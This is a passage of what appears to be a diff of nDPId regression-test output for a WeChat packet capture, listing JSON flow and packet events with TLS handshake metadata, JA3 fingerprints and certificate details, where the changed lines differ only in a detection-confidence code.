{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1492167454801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454801,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701bGHEoeHTtsI6ASN8gRwgAAAgQFoAQCCApF0gdIADEdBAEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1492167454802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454802,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cSdAAEAGpB3AqAFny82XotNWAbsdO2wjxhxKH4AQAOV3BwAAAQEICgAxHVpF0gdI"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454458,"flow_last_seen":1492167454802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454802,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454458,"flow_last_seen":1492167454802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454802,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454818,"flow_last_seen":1492167454818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454818,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1492167454818,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454818,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8NuJAAEAG3lrAqAFny82XotNXAbvn9Cu8AAAAAKACchCqHQAAAgQFtAQCCAoAMR1eAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1492167454836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454836,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701XgAvN\/nuz0f6ASN8ip9gAAAgQFoAQCCApFraHjADEdBAEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1492167454836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454836,"pkt":"8IQvSpdgeJKcD6iOCABFAAA06XtAAEAGK8nAqAFny82XotNVAbue7PR\/4ALzgIAQAOUPMwAAAQEICgAxHWNFraHj"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454457,"flow_last_seen":1492167454837,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454837,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":544,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454458,"flow_last_seen":1492167455179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1492167455179,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454457,"flow_last_seen":1492167454837,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454837,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":544,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454458,"flow_last_seen":1492167455179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1492167455179,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1492167455179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455179,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701d\/O17O5\/QrvaASN8geewAAAgQFoAQCCApFraI2ADEdXgEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1492167455179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455179,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0NuNAAEAG3mHAqAFny82XotNXAbvn9Cu9fztez4AQAOWDvAAAAQEICgAxHbhFraI2"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454818,"flow_last_seen":1492167455180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455180,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454457,"flow_last_seen":1492167455193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455193,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454457,"flow_last_seen":1492167455196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167455196,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454818,"flow_last_seen":1492167455501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455501,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454818,"flow_last_seen":1492167455502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167455502,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454818,"flow_last_seen":1492167455180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455180,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454457,"flow_last_seen":1492167455193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455193,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454457,"flow_last_seen":1492167455196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167455196,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454818,"flow_last_seen":1492167455501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455501,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454818,"flow_last_seen":1492167455502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167455502,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167455528,"flow_last_seen":1492167455528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167455528,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1492167455528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455528,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8kudAAEAGglXAqAFny82XotNYAbvneYz3AAAAAKACchBIqgAAAgQFtAQCCAoAMR4QAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1492167455891,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455891,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701iyhnqT53mM+KASN8htQwAAAgQFoAQCCApFraLqADEeEAEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1492167455891,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455891,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0kuhAAEAGglzAqAFny82XotNYAbvneYz4soZ6lIAQAOXShAAAAQEICgAxHmpFraLq"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167455528,"flow_last_seen":1492167455891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":648,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167455528,"flow_last_seen":1492167456251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167456251,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 